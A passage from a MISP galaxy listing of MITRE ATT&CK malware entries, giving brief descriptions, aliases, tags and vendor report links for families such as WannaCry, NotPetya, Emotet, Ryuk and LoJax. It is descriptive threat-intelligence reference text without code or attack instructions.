https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/

https://securelist.com/dridex-a-history-of-evolution/78531/

https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation

GoldenSpy - S0493

[GoldenSpy](https://attack.mitre.org/software/S0493) is a backdoor malware which has been packaged with legitimate tax preparation software. [GoldenSpy](https://attack.mitre.org/software/S0493) was discovered targeting organizations in China, being delivered with the "Intelligent Tax" software suite which is produced by the Golden Tax Department of Aisino Credit Information Co. and required to pay local taxes.(Citation: Trustwave GoldenSpy June 2020)

The tag is: misp-galaxy:mitre-malware="GoldenSpy - S0493"

GoldenSpy - S0493 is also known as:

  • GoldenSpy

Table 7709. Table References

Links

https://attack.mitre.org/software/S0493

https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/

HiddenWasp - S0394

[HiddenWasp](https://attack.mitre.org/software/S0394) is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.(Citation: Intezer HiddenWasp Map 2019)

The tag is: misp-galaxy:mitre-malware="HiddenWasp - S0394"

HiddenWasp - S0394 is also known as:

  • HiddenWasp

Table 7710. Table References

Links

https://attack.mitre.org/software/S0394

https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/

Okrum - S0439

[Okrum](https://attack.mitre.org/software/S0439) is a Windows backdoor that has been seen in use since December 2016 with strong links to [Ke3chang](https://attack.mitre.org/groups/G0004).(Citation: ESET Okrum July 2019)

The tag is: misp-galaxy:mitre-malware="Okrum - S0439"

Okrum - S0439 is also known as:

  • Okrum

Table 7711. Table References

Links

https://attack.mitre.org/software/S0439

https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf

MoleNet - S0553

[MoleNet](https://attack.mitre.org/software/S0553) is a downloader tool with backdoor capabilities that has been observed in use since at least 2019.(Citation: Cybereason Molerats Dec 2020)

The tag is: misp-galaxy:mitre-malware="MoleNet - S0553"

MoleNet - S0553 is also known as:

  • MoleNet

Table 7712. Table References

Links

https://attack.mitre.org/software/S0553

https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

BoomBox - S0635

[BoomBox](https://attack.mitre.org/software/S0635) is a downloader responsible for executing next stage components that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)

The tag is: misp-galaxy:mitre-malware="BoomBox - S0635"

BoomBox - S0635 is also known as:

  • BoomBox

Table 7713. Table References

Links

https://attack.mitre.org/software/S0635

https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

xCaon - S0653

[xCaon](https://attack.mitre.org/software/S0653) is an HTTP variant of the [BoxCaon](https://attack.mitre.org/software/S0651) malware family that has used by [IndigoZebra](https://attack.mitre.org/groups/G0136) since at least 2014. [xCaon](https://attack.mitre.org/software/S0653) has been used to target political entities in Central Asia, including Kyrgyzstan and Uzbekistan.(Citation: Checkpoint IndigoZebra July 2021)(Citation: Securelist APT Trends Q2 2017)

The tag is: misp-galaxy:mitre-malware="xCaon - S0653"

xCaon - S0653 is also known as:

  • xCaon

Table 7714. Table References

Links

https://attack.mitre.org/software/S0653

https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/

https://securelist.com/apt-trends-report-q2-2017/79332/

GPlayed - S0536

[GPlayed](https://attack.mitre.org/software/S0536) is an Android trojan with a broad range of capabilities.(Citation: Talos GPlayed)

The tag is: misp-galaxy:mitre-malware="GPlayed - S0536"

GPlayed - S0536 is also known as:

  • GPlayed

Table 7715. Table References

Links

https://attack.mitre.org/software/S0536

https://blog.talosintelligence.com/2018/10/gplayedtrojan.html

KONNI - S0356

[KONNI](https://attack.mitre.org/software/S0356) is a remote access tool that security researchers assess has been used by North Korean cyber actors since at least 2014. [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family, and has been linked to several suspected North Korean campaigns targeting political organizations in Russia, East Asia, Europe and the Middle East; there is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Talos Konni May 2017)(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021)

The tag is: misp-galaxy:mitre-malware="KONNI - S0356"

KONNI - S0356 is also known as:

  • KONNI

Table 7716. Table References

Links

https://attack.mitre.org/software/S0356

https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/

https://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html

https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b

https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/

https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/

HyperStack - S0537

[HyperStack](https://attack.mitre.org/software/S0537) is a RPC-based backdoor used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2018. [HyperStack](https://attack.mitre.org/software/S0537) has similarities to other backdoors used by [Turla](https://attack.mitre.org/groups/G0010) including [Carbon](https://attack.mitre.org/software/S0335).(Citation: Accenture HyperStack October 2020)

The tag is: misp-galaxy:mitre-malware="HyperStack - S0537"

HyperStack - S0537 is also known as:

  • HyperStack

Table 7717. Table References

Links

https://attack.mitre.org/software/S0537

https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity

Remexi - S0375

[Remexi](https://attack.mitre.org/software/S0375) is a Windows-based Trojan that was developed in the C programming language.(Citation: Securelist Remexi Jan 2019)

The tag is: misp-galaxy:mitre-malware="Remexi - S0375"

Remexi - S0375 is also known as:

  • Remexi

Table 7718. Table References

Links

https://attack.mitre.org/software/S0375

https://securelist.com/chafer-used-remexi-malware/89538/

njRAT - S0385

[njRAT](https://attack.mitre.org/software/S0385) is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.(Citation: Fidelis njRAT June 2013)

The tag is: misp-galaxy:mitre-malware="njRAT - S0385"

njRAT - S0385 is also known as:

  • njRAT

  • Njw0rm

  • LV

  • Bladabindi

Table 7719. Table References

Links

https://attack.mitre.org/software/S0385

https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/

https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html

https://www.threatminer.org/_reports/2013/fta-1009---njrat-uncovered-1.pdf

Crutch - S0538

[Crutch](https://attack.mitre.org/software/S0538) is a backdoor designed for document theft that has been used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2015.(Citation: ESET Crutch December 2020)

The tag is: misp-galaxy:mitre-malware="Crutch - S0538"

Crutch - S0538 is also known as:

  • Crutch

Table 7720. Table References

Links

https://attack.mitre.org/software/S0538

https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/

Pysa - S0583

[Pysa](https://attack.mitre.org/software/S0583) is a ransomware that was first used in October 2018 and has been seen to target particularly high-value finance, government and healthcare organizations.(Citation: CERT-FR PYSA April 2020)

The tag is: misp-galaxy:mitre-malware="Pysa - S0583"

Pysa - S0583 is also known as:

  • Pysa

  • Mespinoza

Table 7721. Table References

Links

https://attack.mitre.org/software/S0583

https://digital.nhs.uk/cyber-alerts/2020/cc-3633

https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-003.pdf

ECCENTRICBANDWAGON - S0593

[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) is a remote access Trojan (RAT) used by North Korean cyber actors that was first identified in August 2020. It is a reconnaissance tool—​with keylogging and screen capture functionality—​used for information gathering on compromised systems.(Citation: CISA EB Aug 2020)

The tag is: misp-galaxy:mitre-malware="ECCENTRICBANDWAGON - S0593"

ECCENTRICBANDWAGON - S0593 is also known as:

  • ECCENTRICBANDWAGON

Table 7722. Table References

Links

https://attack.mitre.org/software/S0593

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a

LightNeuron - S0395

[LightNeuron](https://attack.mitre.org/software/S0395) is a sophisticated backdoor that has targeted Microsoft Exchange servers since at least 2014. [LightNeuron](https://attack.mitre.org/software/S0395) has been used by [Turla](https://attack.mitre.org/groups/G0010) to target diplomatic and foreign affairs-related organizations. The presence of certain strings in the malware suggests a Linux variant of [LightNeuron](https://attack.mitre.org/software/S0395) exists.(Citation: ESET LightNeuron May 2019)

The tag is: misp-galaxy:mitre-malware="LightNeuron - S0395"

LightNeuron - S0395 is also known as:

  • LightNeuron

Table 7723. Table References

Links

https://attack.mitre.org/software/S0395

https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf

WannaCry - S0366

[WannaCry](https://attack.mitre.org/software/S0366) is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.(Citation: LogRhythm WannaCry)(Citation: US-CERT WannaCry 2017)(Citation: Washington Post WannaCry 2017)(Citation: FireEye WannaCry 2017)

The tag is: misp-galaxy:mitre-malware="WannaCry - S0366"

WannaCry - S0366 is also known as:

  • WannaCry

  • WanaCry

  • WanaCrypt

  • WanaCrypt0r

  • WCry

Table 7724. Table References

Links

https://attack.mitre.org/software/S0366

https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/

https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html

https://www.secureworks.com/research/wcry-ransomware-analysis

https://www.us-cert.gov/ncas/alerts/TA17-132A

https://www.washingtonpost.com/business/economy/more-than-150-countries-affected-by-massive-cyberattack-europol-says/2017/05/14/5091465e-3899-11e7-9e48-c4f199710b69_story.html?utm_term=.7fa16b41cad4

VaporRage - S0636

[VaporRage](https://attack.mitre.org/software/S0636) is a shellcode downloader that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)

The tag is: misp-galaxy:mitre-malware="VaporRage - S0636"

VaporRage - S0636 is also known as:

  • VaporRage

Table 7725. Table References

Links

https://attack.mitre.org/software/S0636

https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

SysUpdate - S0663

[SysUpdate](https://attack.mitre.org/software/S0663) is a backdoor written in C++ that has been used by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2020.(Citation: Trend Micro Iron Tiger April 2021)

The tag is: misp-galaxy:mitre-malware="SysUpdate - S0663"

SysUpdate - S0663 is also known as:

  • SysUpdate

  • HyperSSL

  • Soldier

  • FOCUSFJORD

Table 7726. Table References

Links

https://attack.mitre.org/software/S0663

https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html

DarkWatchman - S0673

[DarkWatchman](https://attack.mitre.org/software/S0673) is a lightweight JavaScript-based remote access tool (RAT) that avoids file operations; it was first observed in November 2021.(Citation: Prevailion DarkWatchman 2021)

The tag is: misp-galaxy:mitre-malware="DarkWatchman - S0673"

DarkWatchman - S0673 is also known as:

  • DarkWatchman

Table 7727. Table References

Links

https://attack.mitre.org/software/S0673

https://www.prevailion.com/darkwatchman-new-fileless-techniques/

Emotet - S0367

[Emotet](https://attack.mitre.org/software/S0367) is a modular malware variant which is primarily used as a downloader for other malware variants such as [TrickBot](https://attack.mitre.org/software/S0266) and [IcedID](https://attack.mitre.org/software/S0483). Emotet first emerged in June 2014 and has been primarily used to target the banking sector. (Citation: Trend Micro Banking Malware Jan 2019)

The tag is: misp-galaxy:mitre-malware="Emotet - S0367"

Emotet - S0367 is also known as:

  • Emotet

  • Geodo

Table 7728. Table References

Links

https://attack.mitre.org/software/S0367

https://blog.talosintelligence.com/2019/01/return-of-emotet.html

https://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/

https://documents.trendmicro.com/assets/white_papers/ExploringEmotetsActivities_Final.pdf

https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/

https://securelist.com/the-banking-trojan-emotet-detailed-analysis/69560/

https://support.malwarebytes.com/docs/DOC-2295

https://www.cisecurity.org/blog/emotet-changes-ttp-and-arrives-in-united-states/

https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/

https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html

https://www.secureworks.com/blog/lazy-passwords-become-rocket-fuel-for-emotet-smb-spreader

https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor

https://www.us-cert.gov/ncas/alerts/TA18-201A

https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/

HOPLIGHT - S0376

[HOPLIGHT](https://attack.mitre.org/software/S0376) is a backdoor Trojan that has reportedly been used by the North Korean government.(Citation: US-CERT HOPLIGHT Apr 2019)

The tag is: misp-galaxy:mitre-malware="HOPLIGHT - S0376"

HOPLIGHT - S0376 is also known as:

  • HOPLIGHT

Table 7729. Table References

Links

https://attack.mitre.org/software/S0376

https://www.us-cert.gov/ncas/analysis-reports/AR19-100A

NativeZone - S0637

[NativeZone](https://attack.mitre.org/software/S0637) is the name given collectively to disposable custom [Cobalt Strike](https://attack.mitre.org/software/S0154) loaders used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)(Citation: SentinelOne NobleBaron June 2021)

The tag is: misp-galaxy:mitre-malware="NativeZone - S0637"

NativeZone - S0637 is also known as:

  • NativeZone

Table 7730. Table References

Links

https://attack.mitre.org/software/S0637

https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/

https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

Babuk - S0638

[Babuk](https://attack.mitre.org/software/S0638) is a Ransomware-as-a-service (RaaS) malware that has been used since at least 2021. The operators of [Babuk](https://attack.mitre.org/software/S0638) employ a "Big Game Hunting" approach to targeting major enterprises and operate a leak site to post stolen data as part of their extortion scheme.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: CyberScoop Babuk February 2021)

The tag is: misp-galaxy:mitre-malware="Babuk - S0638"

Babuk - S0638 is also known as:

  • Babuk

  • Babyk

  • Vasa Locker

Table 7731. Table References

Links

https://attack.mitre.org/software/S0638

https://www.cyberscoop.com/babuk-ransomware-serco-attack/

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf

https://www.sogeti.com/globalassets/reports/cybersecchronicles-_babuk.pdf

https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html

NotPetya - S0368

[NotPetya](https://attack.mitre.org/software/S0368) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) in a worldwide attack starting on June 27, 2017. While [NotPetya](https://attack.mitre.org/software/S0368) appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://attack.mitre.org/software/S0368) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://attack.mitre.org/software/S0368) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: ESET Telebots June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)

The tag is: misp-galaxy:mitre-malware="NotPetya - S0368"

NotPetya - S0368 is also known as:

  • NotPetya

  • ExPetr

  • Diskcoder.C

  • GoldenEye

  • Petrwrap

  • Nyetya

Table 7732. Table References

Links

https://attack.mitre.org/software/S0368

https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html

https://www.justice.gov/opa/press-release/file/1328521/download

https://www.us-cert.gov/ncas/alerts/TA17-181A

https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/

Ursnif - S0386

[Ursnif](https://attack.mitre.org/software/S0386) is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)s, and malicious links.(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016) [Ursnif](https://attack.mitre.org/software/S0386) is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.(Citation: TrendMicro Ursnif Mar 2015)

The tag is: misp-galaxy:mitre-malware="Ursnif - S0386"

Ursnif - S0386 is also known as:

  • Ursnif

  • Gozi-ISFB

  • PE_URSNIF

  • Dreambot

Table 7733. Table References

Links

https://attack.mitre.org/software/S0386

https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/?_ga=2.165628854.808042651.1508120821-744063452.1505819992

https://www.cyber.nj.gov/threat-profiles/trojan-variants/ursnif

https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html

https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality

EvilBunny - S0396

[EvilBunny](https://attack.mitre.org/software/S0396) is a C++ malware sample observed since 2011 that was designed to be a execution platform for Lua scripts.(Citation: Cyphort EvilBunny Dec 2014)

The tag is: misp-galaxy:mitre-malware="EvilBunny - S0396"

EvilBunny - S0396 is also known as:

  • EvilBunny

Table 7734. Table References

Links

https://attack.mitre.org/software/S0396

https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/

CoinTicker - S0369

[CoinTicker](https://attack.mitre.org/software/S0369) is a malicious application that poses as a cryptocurrency price ticker and installs components of the open source backdoors EvilOSX and EggShell.(Citation: CoinTicker 2019)

The tag is: misp-galaxy:mitre-malware="CoinTicker - S0369"

CoinTicker - S0369 is also known as:

  • CoinTicker

Table 7735. Table References

Links

https://attack.mitre.org/software/S0369

https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/

CaddyWiper - S0693

[CaddyWiper](https://attack.mitre.org/software/S0693) is a destructive data wiper that has been used in attacks against organizations in Ukraine since at least March 2022.(Citation: ESET CaddyWiper March 2022)(Citation: Cisco CaddyWiper March 2022)

The tag is: misp-galaxy:mitre-malware="CaddyWiper - S0693"

CaddyWiper - S0693 is also known as:

  • CaddyWiper

Table 7736. Table References

Links

https://attack.mitre.org/software/S0693

https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html

https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine

Ebury - S0377

[Ebury](https://attack.mitre.org/software/S0377) is an SSH backdoor targeting Linux operating systems. Attackers require root-level access, which allows them to replace SSH binaries (ssh, sshd, ssh-add, etc) or modify a shared library used by OpenSSH (libkeyutils).(Citation: ESET Ebury Feb 2014)(Citation: BleepingComputer Ebury March 2017)(Citation: ESET Ebury Oct 2017)

The tag is: misp-galaxy:mitre-malware="Ebury - S0377"

Ebury - S0377 is also known as:

  • Ebury

Table 7737. Table References

Links

https://attack.mitre.org/software/S0377

https://www.bleepingcomputer.com/news/security/russian-hacker-pleads-guilty-for-role-in-infamous-linux-ebury-malware/

https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/

https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/

KeyBoy - S0387

[KeyBoy](https://attack.mitre.org/software/S0387) is malware that has been used in targeted campaigns against members of the Tibetan Parliament in 2016.(Citation: CitizenLab KeyBoy Nov 2016)(Citation: PWC KeyBoys Feb 2017)

The tag is: misp-galaxy:mitre-malware="KeyBoy - S0387"

KeyBoy - S0387 is also known as:

  • KeyBoy

Table 7738. Table References

Links

https://attack.mitre.org/software/S0387

https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/

https://citizenlab.ca/2016/11/parliament-keyboy/

https://web.archive.org/web/20211129064701/https://www.pwc.co.uk/issues/cyber-security-services/research/the-keyboys-are-back-in-town.html

LoJax - S0397

[LoJax](https://attack.mitre.org/software/S0397) is a UEFI rootkit used by [APT28](https://attack.mitre.org/groups/G0007) to persist remote access software on targeted systems.(Citation: ESET LoJax Sept 2018)

The tag is: misp-galaxy:mitre-malware="LoJax - S0397"

LoJax - S0397 is also known as:

  • LoJax

Table 7739. Table References

Links

https://attack.mitre.org/software/S0397

https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf

YAHOYAH - S0388

[YAHOYAH](https://attack.mitre.org/software/S0388) is a Trojan used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) as a second-stage backdoor.(Citation: TrendMicro TropicTrooper 2015)

The tag is: misp-galaxy:mitre-malware="YAHOYAH - S0388"

YAHOYAH - S0388 is also known as:

  • YAHOYAH

Table 7740. Table References

Links

https://attack.mitre.org/software/S0388

https://documents.trendmicro.com/assets/wp/wp-operation-tropic-trooper.pdf

HyperBro - S0398

[HyperBro](https://attack.mitre.org/software/S0398) is a custom in-memory backdoor used by [Threat Group-3390](https://attack.mitre.org/groups/G0027).(Citation: Unit42 Emissary Panda May 2019)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)

The tag is: misp-galaxy:mitre-malware="HyperBro - S0398"

HyperBro - S0398 is also known as:

  • HyperBro

Table 7741. Table References

Links

https://attack.mitre.org/software/S0398

https://securelist.com/luckymouse-hits-national-data-center/86083/

https://thehackernews.com/2018/06/chinese-watering-hole-attack.html

https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/

JCry - S0389

[JCry](https://attack.mitre.org/software/S0389) is ransomware written in Go. It was identified as apart of the #OpJerusalem 2019 campaign.(Citation: Carbon Black JCry May 2019)

The tag is: misp-galaxy:mitre-malware="JCry - S0389"

JCry - S0389 is also known as:

  • JCry

Table 7742. Table References

Links

https://attack.mitre.org/software/S0389

https://www.carbonblack.com/2019/05/14/cb-tau-threat-intelligence-notification-jcry-ransomware-pretends-to-be-adobe-flash-player-update-installer/

Pallas - S0399

[Pallas](https://attack.mitre.org/software/S0399) is mobile surveillanceware that was custom-developed by [Dark Caracal](https://attack.mitre.org/groups/G0070).(Citation: Lookout Dark Caracal Jan 2018)

The tag is: misp-galaxy:mitre-malware="Pallas - S0399"

Pallas - S0399 is also known as:

  • Pallas

Table 7743. Table References

Links

https://attack.mitre.org/software/S0399

https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf

ShimRat - S0444

[ShimRat](https://attack.mitre.org/software/S0444) has been used by the suspected China-based adversary [Mofang](https://attack.mitre.org/groups/G0103) in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development. The name "[ShimRat](https://attack.mitre.org/software/S0444)" comes from the malware’s extensive use of Windows Application Shimming to maintain persistence. (Citation: FOX-IT May 2016 Mofang)

The tag is: misp-galaxy:mitre-malware="ShimRat - S0444"

ShimRat - S0444 is also known as:

  • ShimRat

Table 7744. Table References

Links

https://attack.mitre.org/software/S0444

https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf

HenBox - S0544

[HenBox](https://attack.mitre.org/software/S0544) is Android malware that attempts to only execute on Xiaomi devices running the MIUI operating system. [HenBox](https://attack.mitre.org/software/S0544) has primarily been used to target Uyghurs, a minority Turkic ethnic group.(Citation: Palo Alto HenBox)

The tag is: misp-galaxy:mitre-malware="HenBox - S0544"

HenBox - S0544 is also known as:

  • HenBox

Table 7745. Table References

Links

https://attack.mitre.org/software/S0544

https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/

Cadelspy - S0454

[Cadelspy](https://attack.mitre.org/software/S0454) is a backdoor that has been used by [APT39](https://attack.mitre.org/groups/G0087).(Citation: Symantec Chafer Dec 2015)

The tag is: misp-galaxy:mitre-malware="Cadelspy - S0454"

Cadelspy - S0454 is also known as:

  • Cadelspy

Table 7746. Table References

Links

https://attack.mitre.org/software/S0454

https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets

ObliqueRAT - S0644

[ObliqueRAT](https://attack.mitre.org/software/S0644) is a remote access trojan, similar to [Crimson](https://attack.mitre.org/software/S0115), that has been in use by [Transparent Tribe](https://attack.mitre.org/groups/G0134) since at least 2020.(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)

The tag is: misp-galaxy:mitre-malware="ObliqueRAT - S0644"

ObliqueRAT - S0644 is also known as:

  • ObliqueRAT

Table 7747. Table References

Links

https://attack.mitre.org/software/S0644

https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html

https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html

SYSCON - S0464

[SYSCON](https://attack.mitre.org/software/S0464) is a backdoor that has been in use since at least 2017 and has been associated with campaigns involving North Korean themes. [SYSCON](https://attack.mitre.org/software/S0464) has been delivered by the [CARROTBALL](https://attack.mitre.org/software/S0465) and [CARROTBAT](https://attack.mitre.org/software/S0462) droppers.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)

The tag is: misp-galaxy:mitre-malware="SYSCON - S0464"

SYSCON - S0464 is also known as:

  • SYSCON

Table 7748. Table References

Links

https://attack.mitre.org/software/S0464

https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/

https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/

Ryuk - S0446

[Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk January 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye FIN6 Apr 2019)

The tag is: misp-galaxy:mitre-malware="Ryuk - S0446"

Ryuk - S0446 is also known as:

  • Ryuk

Table 7749. Table References

Links

https://attack.mitre.org/software/S0446

https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html

https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

Lokibot - S0447

[Lokibot](https://attack.mitre.org/software/S0447) is a widely distributed information stealer that was first reported in 2015. It is designed to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials. [Lokibot](https://attack.mitre.org/software/S0447) can also create a backdoor into infected systems to allow an attacker to install additional payloads.(Citation: Infoblox Lokibot January 2019)(Citation: Morphisec Lokibot April 2020)(Citation: CISA Lokibot September 2020)

The tag is: misp-galaxy:mitre-malware="Lokibot - S0447"

Lokibot - S0447 is also known as:

  • Lokibot

Table 7750. Table References

Links

https://attack.mitre.org/software/S0447

https://blog.morphisec.com/lokibot-with-autoit-obfuscator-frenchy-shellcode

https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html

https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence—​22

https://us-cert.cisa.gov/ncas/alerts/aa20-266a

Carberp - S0484

[Carberp](https://attack.mitre.org/software/S0484) is a credential and information stealing malware that has been active since at least 2009. [Carberp](https://attack.mitre.org/software/S0484)'s source code was leaked online in 2013, and subsequently used as the foundation for the [Carbanak](https://attack.mitre.org/software/S0030) backdoor.(Citation: Trend Micro Carberp February 2014)(Citation: KasperskyCarbanak)(Citation: RSA Carbanak November 2017)

The tag is: misp-galaxy:mitre-malware="Carberp - S0484"

Carberp - S0484 is also known as:

  • Carberp

Table 7751. Table References

Links

https://attack.mitre.org/software/S0484

https://securelist.com/the-great-bank-robbery-the-carbanak-apt/68732/

https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdf

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/carberp

Maze - S0449

[Maze](https://attack.mitre.org/software/S0449) ransomware, previously known as "ChaCha", was discovered in May 2019. In addition to encrypting files on victim machines for impact, [Maze](https://attack.mitre.org/software/S0449) operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.(Citation: FireEye Maze May 2020)(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)

The tag is: misp-galaxy:mitre-malware="Maze - S0449"

Maze - S0449 is also known as:

  • Maze

Table 7752. Table References

Links

https://attack.mitre.org/software/S0449

https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/

https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/

Zen - S0494

[Zen](https://attack.mitre.org/software/S0494) is Android malware that was first seen in 2013.(Citation: Google Security Zen)

The tag is: misp-galaxy:mitre-malware="Zen - S0494"

Zen - S0494 is also known as:

  • Zen

Table 7753. Table References

Links

https://attack.mitre.org/software/S0494

https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html

TERRACOTTA - S0545

[TERRACOTTA](https://attack.mitre.org/software/S0545) is an ad fraud botnet that has been capable of generating over 2 billion fraudulent requests per week.(Citation: WhiteOps TERRACOTTA)

